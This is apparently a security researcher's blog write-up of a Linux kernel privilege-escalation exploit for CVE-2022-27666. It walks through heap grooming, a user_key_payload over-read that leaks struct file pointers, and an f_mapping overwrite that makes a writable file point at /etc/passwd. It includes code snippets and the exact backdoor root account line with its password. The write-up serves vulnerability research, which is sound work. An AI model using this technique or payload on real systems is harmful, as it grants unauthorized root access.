CVE-2022-27666: My file your memory

Preface

Before I get started with this post, I want to give a shoutout to OpenAI’s DALL-E for generating this wacky cover photo. I will keep this trend of AI cover photos from now on.

Now let’s start by laying out the basis of this post. We assume a threat model in which the attacker runs with user-level privileges and needs to reach a privileged state that allows them to execute as the root account. Commonly, exploit authors rely on reaching kernel-context code execution to run their shellcode, which is basically commit_creds(prepare_kernel_cred(0)), as explained in more detail in trickster0’s blog post. Another common method is to overwrite modprobe_path so that it points to a file we control. When modprobe is executed, our file is executed with root privileges.

Some other methods of privilege escalation do not rely on kernel bugs at all, but on misconfiguration of the operating system. Carlos’ tool, PEASS-ng, is a suite of scripts designed to find misconfigured system resources (such as files, directories, sockets etc). After looking at what the scripts search for, I noticed that privilege escalation involves:

- writing into root-owned and/or unwritable files or memory

- reading from root-owned and/or unreadable files or memory

With that in mind, privilege escalation can be achieved if the attacker can reach either of the 2 states above. We can use Linux kernel bugs to reach those states. In fact, I demonstrated which kernel structures can be corrupted to reach those states in SCAVY. I highly encourage readers to look into that paper.

Introduction

In this blog post, I will explore a new approach to exploiting CVE-2022-27666. The exploitation technique involves overwriting the f_mapping pointer in struct file. As shown in SCAVY, this corruption allows reading and writing root-owned files. I will explain the technique in the next sections, after introducing the vulnerability and how we leverage the capability it gives us. Basically, the exploit gains the ability to write to /etc/passwd and inserts this line: albocoder:$1$KCPMXNrz$RkFUDj69PHe.T4cGUqzv91:0:0:root:/root:/bin/bash. I will explain more about the payload in the later sections. Our exploit is tested on Ubuntu 21.10 running Linux kernel 5.13.0-19-generic.

Vulnerability

As Etenal has described in his excellent blog post, CVE-2022-27666 is a vulnerability in the Linux esp6 crypto module: the receiving buffer of a user message is an 8-page buffer, but the sender can send a message larger than 8 pages, which creates a page-level buffer overflow. For this blog post I will rely on the same starting capability as the prior blog post: an 8-page memory write, constrained to the pages immediately following the vulnerable object. For a more detailed explanation of the vulnerability please read Etenal’s blog.

Exploitation

Our exploitation involves an 8-step procedure. In this section I will briefly summarize the whole attack; the subsections below go into the details and the reasons why we chose this method.

At a high level, we need to leak the f_mapping pointer from the struct file (src) of /etc/passwd and then overwrite the f_mapping pointer of a file we can write to with it. I decided to use the same kernel memory read primitive from the previous blog post to leak the file pointer. Basically, we overflow into the datalen field of struct user_key_payload so that reading the key reads past the object into the following pages.

struct user_key_payload {

struct rcu_head rcu; /* RCU destructor */

unsigned short datalen; /* length of this data */

char data[] __aligned(__alignof__(u64)); /* actual data */

};
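To make the datalen trick concrete, here is a small userspace model of it. This is only a sketch: model_payload, model_key_read and neighbour_leaked are hypothetical names, the arena is a plain calloc() buffer rather than kernel memory, and the read helper simply assumes that the key read path copies min(datalen, buflen) bytes starting at data.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Userspace model: only the fields that matter for the over-read. */
struct model_payload {
    unsigned short datalen;   /* length trusted by the read path */
    unsigned char data[];     /* payload bytes follow the header */
};

/* Assumed read behaviour: copy min(datalen, buflen) bytes, return datalen. */
static size_t model_key_read(const struct model_payload *p,
                             unsigned char *buf, size_t buflen)
{
    size_t n = p->datalen < buflen ? p->datalen : buflen;

    assert(buf != NULL);
    memcpy(buf, p->data, n);
    return p->datalen;
}

/* 4 payload bytes followed by 6 "neighbour" bytes in the same arena.
 * Returns 1 if the neighbour bytes show up in the read, 0 if not,
 * -1 on allocation failure. */
static int neighbour_leaked(unsigned short corrupted_len)
{
    unsigned char out[32] = {0};
    struct model_payload *p = calloc(1, 64);
    int leaked;

    if (!p)
        return -1;
    memcpy(p->data, "AAAA", 4);            /* legitimate payload */
    memcpy(p->data + 4, "SECRET", 6);      /* stands in for the next object */
    p->datalen = corrupted_len;            /* what the overflow changes */
    (void)model_key_read(p, out, sizeof(out));
    leaked = memcmp(out + 4, "SECRET", 6) == 0;
    free(p);
    return leaked;
}
```

With the honest length (4) the neighbour stays hidden; once datalen is raised to 10 the same read returns the bytes that follow the payload. Since datalen is an unsigned short, a single read can expose at most 65535 bytes.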

In the pages next to user_key_payload we allocate a large number of struct vm_area_struct (src) objects that map 2 files: a dummy file that is opened with read/write permissions and our victim, /etc/passwd. We use the primitive mentioned above to leak the vm_file pointer of a vm_area_struct that maps the pages of /etc/passwd. I will get into the details of how to tell which vm_file points to which of the 2 files later. Next, we use the arbitrary read via msg_msg to leak the struct file->f_mapping pointer of the struct file of /etc/passwd. Finally, we leverage the arbitrary write primitive that relies on the msg_msg+fuse technique to overwrite the f_mapping pointer of the struct file of the dummy file.

In summary our exploitation will be as follows:

- Massage the heap to account for noise and get the desired layout for the next step.

- Allocate the 8 vulnerable skb pages followed by the 8 pages of user_key_payload.

- Allocate some pages of vm_area_struct next to user_key_payload in a way that some map a dummy file with read/write privileges and some map /etc/passwd with read privileges.

- Overwrite datalen from user_key_payload and read into the page filled with vm_area_struct’s of the 2 files.

- Leak the vm_area_struct->vm_file pointers that point to the struct file of the dummy file and of /etc/passwd.

- Use the msg_msg arbitrary read to read the file->f_mapping pointer of the struct file of /etc/passwd.

- Use the msg_msg arbitrary write primitive to overwrite the f_mapping pointer of the struct file of our dummy file with the value leaked in the previous step.

- Write into /etc/passwd a line to create a new root-level account.

Important machinations of page allocator



The Linux kernel page allocator is a simple type of buddy allocator with a very basic API. To request a page allocation one can call __alloc_pages(type, order, nodemask) (src). The parameters are (1) type, which specifies whether the page(s) will be kernel, user or DMA page(s), (2) order, which specifies the power of 2 for the number of pages to be allocated, and (3) nodemask, which is used to specify which NUMA node to use for the allocation. We won’t worry about the NUMA node, since by default the kernel is compiled with a single NUMA node. We also don’t need to worry about the type, since the slab allocators all request GFP_KERNEL page types and we can’t mess with that as the attacker. The only thing we care about is the order: a request of a given order allocates 2^order pages. The call returns a page object pointer that encapsulates all the pages that were allocated. It follows that the buddy allocator can only hand out page counts from the sequence 1, 2, 4, 8, 16, .... Similarly, to free the pages one can call __free_pages(struct page*, order) (src), which tells the allocator how many pages to free from the starting page.
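The relationship between order, page count and request size can be sketched in a few lines of C. The helper names are hypothetical, PAGE_SIZE is assumed to be 4096, and the cap at order 10 is my assumption about a typical build, not something taken from the exploit.

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SIZE 4096UL   /* assumption: 4 KiB pages */
#define MAX_SKETCH_ORDER 10 /* assumption: largest order modelled here */

/* Number of pages handed out by one allocation of the given order. */
static unsigned long pages_for_order(unsigned int order)
{
    return 1UL << order;
}

/* Smallest order whose block is large enough to hold `bytes` bytes. */
static unsigned int order_for_size(size_t bytes)
{
    unsigned int order = 0;

    assert(bytes <= (PAGE_SIZE << MAX_SKETCH_ORDER));
    while ((PAGE_SIZE << order) < bytes)
        order++;
    return order;
}
```

For example, a request for 5 pages’ worth of memory cannot be served exactly; it is rounded up to order 3, that is 8 pages.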

The allocator works in a LIFO manner, meaning that the most recently freed pages will be returned to satisfy an allocation, but this is not very important to us. What is more important to our exploit is that when freeing a block of pages the allocator will merge consecutive lower-order blocks if they can make up a higher-order one. For example, if 2 order 0 pages (meaning 2^0 = 1 page each) are freed and they are consecutive (more precisely, if they are buddies, the two halves of the same aligned order 1 block), they will be put into the freelist of order 1. This will come in useful when we choose how to mitigate noise on order 3 pages. Additionally, to ensure that 2 order 3 allocations are consecutive we must exhaust the order 3 freelist and force the allocator to split an order 4 block into 2 order 3 blocks. I won’t bore you with more details on the buddy allocator since I already linked the source code of the allocator that our host is using, but if you are interested in its inner machinations check it here, which is also where I took the screenshot in Figure 1.
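The merging rule is easier to see with page frame numbers. In a buddy allocator, the buddy of an aligned block is found by flipping the bit that corresponds to the block size. The following is a minimal sketch of that arithmetic, with hypothetical helper names, not the kernel’s own code.

```c
#include <assert.h>

/* Page frame number of the buddy of the order-`order` block at `pfn`. */
static unsigned long buddy_pfn(unsigned long pfn, unsigned int order)
{
    /* A block of 2^order pages always starts on a 2^order boundary. */
    assert((pfn & ((1UL << order) - 1)) == 0);
    return pfn ^ (1UL << order);
}

/* Start of the order+1 block formed once both buddies are free. */
static unsigned long merged_pfn(unsigned long pfn, unsigned int order)
{
    return pfn & ~(1UL << order);
}
```

Note that being adjacent is not enough to merge: the order 3 blocks at page frames 8 and 16 sit next to each other, but the buddy of 8 is 0 and the buddy of 16 is 24. This is also why splitting a fresh order 4 block is the reliable way to get 2 consecutive order 3 blocks.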



Additionally, I want to point out that the slab allocator compartmentalizes allocation requests. A call to kmalloc(size) rounds the requested size up to the next size class (mostly powers of 2) and finds the compartment (officially named cache) that has objects of that size allocated in its pages. For example, a call to kmalloc(54) will allocate the object in the kmalloc-64 cache. However, the slab allocator also allows one to request allocations from special caches. For example, a mmap() call will cause the kernel to call kmem_cache_alloc() on the dedicated vm_area_struct cache, which allocates a new vm_area_struct in the special cache with the same name. Similarly, a call to fork() or clone() will, among other allocations, also allocate a struct task_struct in the task_struct cache. To view all the caches and statistics about the number of allocated objects, a root user can simply cat /proc/slabinfo. The output looks like Figure 2. In the default Ubuntu 20.04 LTS there seem to be 188 caches.
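As a rough illustration of the size rounding, the sketch below maps a request size to a general-purpose cache. The table of size classes is an assumption about a typical x86-64 SLUB build (it includes the two non-power-of-2 classes, 96 and 192), and kmalloc_class is a hypothetical helper, not a kernel function.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed general-purpose size classes (kmalloc-8 ... kmalloc-8k). */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Object size of the cache that would serve `size`,
 * or 0 if the request is larger than anything in the table. */
static size_t kmalloc_class(size_t size)
{
    size_t i;

    assert(size > 0); /* kmalloc(0) is a special case, not modelled here */
    for (i = 0; i < sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]); i++)
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    return 0;
}
```

Under these assumptions kmalloc_class(54) is 64, matching the example above, while a 2049-byte object no longer fits kmalloc-2k and ends up in kmalloc-4k.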

The 5 integer columns in the figure above indicate the following:

- number of active objects (slots that are allocated)

- total number of objects (slots across all pages allocated for this cache)

- object size (in bytes)

- objects per slab (number of slots allocatable in a slab)

- pages per slab (number of pages to allocate whenever a new slab is needed)

A slab is a set of 2^order pages. Let’s illustrate this with an example. Below I added what my task_struct cache currently looks like. A single struct is 6400 bytes, which is more than 1 page on my system (PAGE_SIZE = 4096), so 1 structure takes ~1.56 pages. Currently there is no need to allocate more pages since there are 735 - 639 = 96 free slots in this cache’s freelist. However, if all slots were taken, the SLUB allocator would call __alloc_pages(GFP_KERNEL, 3, NULL); and get 8 new consecutive pages that hold 5 slots to satisfy the allocations.

task_struct 639 735 6400 5 8 : tunables 0 0 0 : slabdata 147 147 0
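The numbers in the slabinfo line above can be checked with a few lines of C. This is only a sketch: struct slab_stat and parse_slabinfo_line are hypothetical names, and the parser reads just the name and the 5 integer columns described earlier.

```c
#include <assert.h>
#include <stdio.h>

/* The cache name plus the 5 integer columns of a /proc/slabinfo line. */
struct slab_stat {
    char name[64];
    unsigned long active_objs;   /* slots currently allocated */
    unsigned long num_objs;      /* total slots in the cache */
    unsigned long objsize;       /* bytes per object */
    unsigned long objperslab;    /* slots per slab */
    unsigned long pagesperslab;  /* pages per slab */
};

/* Returns 0 on success, -1 if the line does not have the expected shape. */
static int parse_slabinfo_line(const char *line, struct slab_stat *out)
{
    int n;

    assert(line != NULL && out != NULL);
    n = sscanf(line, "%63s %lu %lu %lu %lu %lu",
               out->name, &out->active_objs, &out->num_objs,
               &out->objsize, &out->objperslab, &out->pagesperslab);
    return n == 6 ? 0 : -1;
}
```

For the task_struct line, pagesperslab * 4096 / objsize gives 32768 / 6400, which truncates to the 5 objects per slab reported by the kernel, and num_objs - active_objs gives the 96 free slots.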

Massaging the memory

First we need to make sure that if any cache needs pages, its allocations don’t mess with our memory. To do that I follow the same logic as Etenal, except for the last step that frees all the objects. Therefore the noise mitigation involves 3 steps:

- drain the freelist of order 0, 1, 2, 3.

- allocate tons of order 2 objects (assume N of them); by doing so, order 2 will borrow pages from order 3.

- free every other object from step 2 and hold the rest. This returns N/2 objects to order 2’s freelist.

This way all allocations of order 2 and below will fall into the holes created in step 3. We expect there to be few order 3+ allocations, so we hope that all our allocations of order 3 pages will be consecutive: after step 1 there are no more order 3 pages scattered around, so the allocator takes 8 pages from order 4. As I illustrate in the GIF below, a 4-page hole will satisfy allocations of order 2 down to 0. Of course N is in the range of 10-30, so there will be up to 30 holes of 4 pages to accommodate the noise.





Leaking pointer to struct file

Once we have mitigated the noise we immediately start with the exploit. As mentioned earlier, I will reuse the same struct user_key_payload out-of-bounds read from the previous exploit. I allocate the vulnerable order 3 skb pages, then allocate 1 user_key_payload object of size 2049 (1 byte more than 2048) so that it gets allocated in the kmalloc-4k cache, whose slabs are order 3. Therefore a new slab request from this cache will allocate order 3 pages, which will land next to our vulnerable object instead of falling into the noise holes. I didn’t change Etenal’s method of having 1 user_key_payload object per kmalloc-4k slab, because it helps a lot with mitigating problems with order 3 noise. It gives us 9 attempts at getting a kmalloc-4k slab placed right after the vulnerable object, because we can allocate up to 9 key payload structures. For more information on why this limit exists check their blog post. Figure 4 illustrates what would happen if we put all user_key_payload objects in one slab: the overflow is useless if that slab doesn’t get allocated in the 8 pages next to the vulnerable object. Figure 5 shows what an improved, noise-resistant layout looks like. Both figures are taken from Etenal’s blog post.

So far so good; now let’s start with our novelty. Once we have the correct slab next to our vulnerable object we need to find an object to leak. I looked into a few candidates that contain a pointer to struct file. My initial idea was to find a structure from the DirtyCred paper that has a pointer to struct file and falls in kmalloc-4k or any order 3 slab. However, I found that vduse_iova_domain corresponds to the vdev device, which is not supported in the stock Ubuntu 21.10 that I’m exploiting. So next I tried to change the exploitation strategy and go for corrupting struct task_struct instead. As we show in our paper, there are multiple fields in task_struct that we can corrupt. However, there were 2 problems: (1) when calling fork() the kernel would allocate task_struct along with hundreds of other structures, which would spill out of the noise holes we made earlier and mess with our exploit’s memory layout, and (2) we would first need to leak the memory address of task_struct, since our primitive is a read and not a write. Specifically for problem 2, we needed to know where the task_struct is allocated so that when we use msg_msg’s arbitrary write we know which address to write to.

Given these 2 problems I decided on a different approach, which I also introduced in the beginning. I start by opening 2 files: a dummy file (let’s call it /tmp/dumdum) with read and write permissions and /etc/passwd with read permission (because we can’t write into it as a non-root user). This causes the kernel to allocate 1 struct file for each open(). One idea is to just open a bunch of files with the hope that a page of struct files gets allocated next to user_key_payload. However, we have the same problem here as we did with task_struct, which is that we don’t know the struct file’s location in memory to overwrite. Therefore, I decided to mmap() the opened files instead, which creates a vm_area_struct for each successful mapping. As you can see below, the structure has vm_next and vm_prev, which link it into a doubly-linked list. Since every allocation links to the previous and next one, we can find the exact page address. Additionally, having vm_start and vm_end allows us to search for the structure more easily, since we know these values from the return value of the mmap() call.

struct vm_area_struct {

unsigned long vm_start;

unsigned long vm_end;

struct vm_area_struct *vm_next, *vm_prev;

struct rb_node vm_rb;

unsigned long rb_subtree_gap;

struct mm_struct *vm_mm;

pgprot_t vm_page_prot;

unsigned long vm_flags;

struct {

struct rb_node rb;

unsigned long rb_subtree_last;

} shared;

struct list_head anon_vma_chain;

struct anon_vma *anon_vma;

const struct vm_operations_struct *vm_ops;

unsigned long vm_pgoff;

struct file * vm_file;

void * vm_private_data;

#ifdef CONFIG_SWAP

atomic_long_t swap_readahead_info;

#endif

#ifndef CONFIG_MMU

struct vm_region *vm_region; /* NOMMU mapping region */

#endif

#ifdef CONFIG_NUMA

struct mempolicy *vm_policy; /* NUMA policy for the VMA */

#endif

struct vm_userfaultfd_ctx vm_userfaultfd_ctx;

} __randomize_layout;

So let’s summarize our exploit so far. As I illustrate in Figure 6, we massage the heap and poke holes, then allocate the vulnerable object and user_key_payload, open the 2 files and mmap them. Then we overwrite the user_key_payload->datalen field and read out of bounds into the page(s) containing vm_area_struct.

As we see, we don’t want to poke too many order 2 holes, or all the mmap() calls will fall into those holes. We allocate vm_area_struct objects by mmap’ing the dummy file 3 out of 4 times and /etc/passwd the remaining 1. This ratio is important because it makes it easy to tell which vm_area_struct->vm_file points to the struct file of /etc/passwd and which one points to the struct file of /tmp/dumdum. So let’s talk in more detail about how we do this. After I open the 2 files I mmap them as shown below.

void* mapped[3000];

int fd = open("/etc/passwd", O_RDONLY);

int fd_dummy = open("/tmp/dumdum", O_RDWR);

for (int i = 0; i < 3000; i++) {

if (i % 4 ==0)

mapped[i] = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, fd, 0);

else

mapped[i] = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd_dummy, 0);

}

As we can see above, vm_area_struct is marked __randomize_layout, which makes it harder to find the offset of each field. I personally found a hacky way to do it, which a user-level attacker wouldn’t be able to use: I created a fake kernel module (say fake.ko), compiled it, and then ran pahole -C vm_area_struct fake.ko, which shows exactly how the structure is laid out in the running kernel. If you want to learn more about this hack, here is a Stack Overflow post. Since vm_area_struct has many null fields and 2 known-value fields, it’s fairly easy for an attacker to figure out the random layout.
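The 2 known-value fields can serve as a signature when scanning the leaked bytes. The sketch below assumes the leak is viewed as an array of 8-byte words and that vm_start and vm_end sit next to each other, as in the declaration order shown earlier; on a kernel where the layout really is shuffled, the distance between them would have to be found first. find_vma is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Scan leaked 8-byte words for a vm_start/vm_end pair belonging to a
 * mapping we created ourselves. Returns the word index of vm_start,
 * or -1 if the pair is not present in the leak. */
static long find_vma(const uint64_t *words, size_t nwords,
                     uint64_t vm_start, uint64_t len)
{
    size_t i;

    assert(words != NULL);
    for (i = 0; i + 1 < nwords; i++)
        if (words[i] == vm_start && words[i + 1] == vm_start + len)
            return (long)i;
    return -1;
}
```

In the exploit’s setting, vm_start would be one of the addresses returned by mmap() and len would be 0x1000, so every mapping we created gives us a pattern to look for.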

So now we have leaked at least 1 page full of vm_area_struct objects. Next we need to find which vm_file pointer points to the struct file of /tmp/dumdum and which one points to that of /etc/passwd. To do that we simply count the occurrences of each value. The one occurring more often is the address of the struct file of our dummy file. Additionally, while we don’t need to, we can also follow vm_next and vm_prev to find the start of the page that contains our vm structures, and from there the address of every structure that we leaked.
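The counting step can be sketched as follows. It assumes the vm_file values have already been extracted from the leak into an array and that exactly 2 distinct pointers are present; classify_vm_files is a hypothetical name and the addresses one would feed it are whatever the leak returned.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Split leaked vm_file values into the majority pointer (dummy file,
 * mapped 3 out of 4 times) and the minority pointer (/etc/passwd).
 * Returns 0 on success, -1 if the leak does not contain exactly two
 * distinct values or if they are equally frequent. */
static int classify_vm_files(const uint64_t *vals, size_t n,
                             uint64_t *dummy, uint64_t *passwd)
{
    uint64_t a = 0, b = 0;
    size_t ca = 0, cb = 0, i;

    assert(vals != NULL && dummy != NULL && passwd != NULL);
    for (i = 0; i < n; i++) {
        if (ca == 0 || vals[i] == a) {
            a = vals[i];
            ca++;
        } else if (cb == 0 || vals[i] == b) {
            b = vals[i];
            cb++;
        } else {
            return -1; /* third distinct value: not the page we expect */
        }
    }
    if (ca == 0 || cb == 0 || ca == cb)
        return -1;
    *dummy = ca > cb ? a : b;
    *passwd = ca > cb ? b : a;
    return 0;
}
```

Rejecting a leak with a third distinct value or a tie is a design choice of this sketch: it is safer to retry than to hand a wrong address to the arbitrary read and write primitives.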

Closing in the exploit with pre-written primitives

After allocating 3000 vm_area_structs we no longer have order 2 noise holes, so first we re-massage the heap and use the same msg_msg arbitrary read technique to read file->f_mapping value from the struct file of /etc/passwd. As we can see below the file structure has __randomize_layout too. I again used the same hacky way to get the correct layout, but I believe one can leak both struct files and figure out the pattern given that there are shared values such as f_op pointer. For more on how this read primitive works check Etenal’s blog post.

struct file {

union {

struct llist_node fu_llist;

struct rcu_head fu_rcuhead;

} f_u;

struct path f_path;

struct inode *f_inode; /* cached value */

const struct file_operations *f_op;

/*

* Protects f_ep, f_flags.

* Must not be taken from IRQ context.

*/

spinlock_t f_lock;

enum rw_hint f_write_hint;

atomic_long_t f_count;

unsigned int f_flags;

fmode_t f_mode;

struct mutex f_pos_lock;

loff_t f_pos;

struct fown_struct f_owner;

const struct cred *f_cred;

struct file_ra_state f_ra;

u64 f_version;

#ifdef CONFIG_SECURITY

void *f_security;

#endif

/* needed for tty driver, and maybe others */

void *private_data;

#ifdef CONFIG_EPOLL

/* Used by fs/eventpoll.c to link all the hooks to this file */

struct hlist_head *f_ep;

#endif /* #ifdef CONFIG_EPOLL */

struct address_space *f_mapping;

errseq_t f_wb_err;

errseq_t f_sb_err; /* for syncfs */

} __randomize_layout

__attribute__((aligned(4))); /* lest something weird decides that 2 is OK */

Then, the prior exploit uses a msg_msg arbitrary write primitive to overwrite modprobe_path, a common target for attackers. I modified their arb_write() code to overwrite the file->f_mapping of the struct file of the dummy file instead. After the overwrite succeeded, read(fd_dummy,buf,6); returned root:x, which is the beginning of /etc/passwd. SUCCESS!

All that was left was to write into the file and close it. I decided to create a root account with the name albocoder and password erin. Of course Linux doesn’t allow passwords to be saved in plaintext, so I hashed it with the command openssl passwd -1 erin. This generates the hash that Linux compares against when we supply erin as the password to su. So first I seek back to the beginning of the file and then call write() with albocoder:$1$KCPMXNrz$RkFUDj69PHe.T4cGUqzv91:0:0:root:/root:/bin/bash. Last, we call exit(0) and boom, Bob’s your uncle…
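For reference, a passwd entry has 7 colon-separated fields: name, password hash, UID, GID, comment, home directory and shell. A UID and GID of 0 are what make the account root-equivalent. The helper below is a hypothetical sketch of how such a line could be assembled before it is written out; it is not taken from the exploit code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Formats "name:hash:0:0:root:/root:/bin/bash\n" into buf.
 * Returns the entry length, or -1 if the name is malformed or
 * buf is too small to hold the whole line. */
static int build_root_entry(char *buf, size_t size,
                            const char *name, const char *hash)
{
    int n;

    assert(buf != NULL && name != NULL && hash != NULL);
    /* A ':' or newline in the name would shift every later field. */
    if (strchr(name, ':') || strchr(name, '\n'))
        return -1;
    n = snprintf(buf, size, "%s:%s:0:0:root:/root:/bin/bash\n", name, hash);
    return (n < 0 || (size_t)n >= size) ? -1 : n;
}
```

Called with the name albocoder and the hash printed by openssl passwd -1, this yields the line shown above followed by a newline, which keeps it from running into whatever entry comes next in the file.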

Now we simply run su albocoder, enter erin as the password, and the id command returns uid 0. Since I tried to keep most of the code the same as the previous exploit code, I will only publish in the GitHub repository the files that have changed.

Video demo

vm_area_struct exploit

Read our paper, which was accepted at USENIX 2024.

Ack

Thanks to Etenal who helped me understand his exploit code and troubleshoot the exploit crashing when trying to corrupt task_struct by calling fork() 100 times.